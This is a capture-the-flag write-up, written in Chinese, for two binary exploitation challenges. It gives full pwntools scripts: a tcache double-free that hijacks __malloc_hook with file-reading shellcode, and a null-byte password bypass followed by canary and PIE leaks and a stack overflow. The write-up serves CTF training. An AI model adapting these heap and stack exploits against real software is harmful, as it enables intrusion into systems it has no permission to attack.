EasyHeap
想可执行的地方写入orw的shellcode,利用tcachebin的df进行劫持malloc_hook
然后调用add来触发。
from pwn import *
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'
p = process('./Easyheap', env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('./libc-2.27.so')
elf = ELF('./Easyheap')
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
def debug():
gdb.attach(p)
pause()
def add(size, con):
sla(">> :\n", "1")
sla("Size: \n", size)
p.sendafter("Content: \n", con)
def delete(index):
sla(">> :\n", "2")
sla("Index:\n", str(index))
def show(index):
sla(">> :\n", "3")
sla("Index:\n", str(index))
def edit(index, con):
sla(">> :\n", "4")
sla("Index:\n", str(index))
p.sendafter("Content:\n", con)
add(0x40,'bpc')
add(0x420,'bpc'*0x160)
add(0x40,'bpc')
add(0x40,'a'*0x40)
add(0x40,'bpc')
add(0x10,'bpc')
delete(1)
edit(0,'a'*0x20)
show(0)
ru(0x20*'a')
libcbase = uu64(r(6)) - 0x3EBCA0
leak('libcbase',libcbase)
malloc = libcbase + libc.sym['__malloc_hook']
mmap = 0x23330000
delete(3)
edit(2, 'a'*0x10+p64(0)+p64(0x51)+p64(mmap))
add(0x40,'a'*0x40)
add(0x40,'a'*0x40)
shellcode = shellcraft.open("flag")
shellcode += shellcraft.read(3, mmap+0x200, 0x50)
shellcode += shellcraft.write(1, mmap+0x200, 0x50)
shellcode = asm(shellcode)
edit(3, shellcode)
delete(5)
edit(4, 'a'*0x10+p64(0)+p64(0x21)+p64(malloc))
add(0x10,'bpc')
add(0x10,p64(mmap))
edit(6,p64(mmap))
add(0x20,'bpc')
#debug()
itr()
old_thing
第一关就是一个逆向,逆向出密码是啥
好叭,密码不太行emmm,直接学习网络上大佬00绕过的方法,利用password长须进行阶段,输入0x20的字符会将用于比较的s2开头的字符置为00所以此时我们需要构造md5后开头为00的字符串对,此时s1的开头也就是00,就可以绕过密码比较。利用下面的脚本进行爆破寻找这样的字符串对:(抄的)
import os
import hashlib
while True:
md5 = hashlib.md5()
key = os.urandom(0x20)
md5.update(key)
res = md5.hexdigest()
if res[:2] == "00":
print("find: ", res, key)
break
绕过这个密码之后就是简单的栈溢出的叭
from pwn import *
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'
p = process('./canary3')#, env={"LD_PRELOAD":'./libc-2.27.so'})
#libc = ELF('./libc-2.27.so')
elf = ELF('./canary3')
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
def debug():
gdb.attach(p)
pause()
p.recvuntil("please input username: ")
p.send(b"admin")
p.recvuntil("please input password: ")
pad = b"b\x80\xfd\xfd[b'\xbb$U\xc6\x8fkw[^\x8a3\xb5h\xb4\xfb\xec\xfe\x15\x08\x85\x0e\x17\xb6y\xf3"
p.send(pad)
sla('3.exit\n',2)
p.sendlineafter('your input:\n','a'*0x18)
sla('3.exit\n',1)
ru('a'*0x18+'\n')
canary = uu64(r(7))*0x100
leak('canary',canary)
sla('3.exit\n',2)
pl = 'a'*0x1f
p.sendlineafter('your input:\n',pl)
sla('3.exit\n',1)
ru('a'*0x1f+'\n')
pie = uu64(r(6))-0x2530
leak('pie',pie)
system = pie+0x023AF
sla('3.exit\n',2)
pl = 'a'*0x18 + p64(canary) + 'a'*8 + p64(system)
p.sendlineafter('your input:\n',pl)
sla('3.exit\n',3)
#debug()
itr()
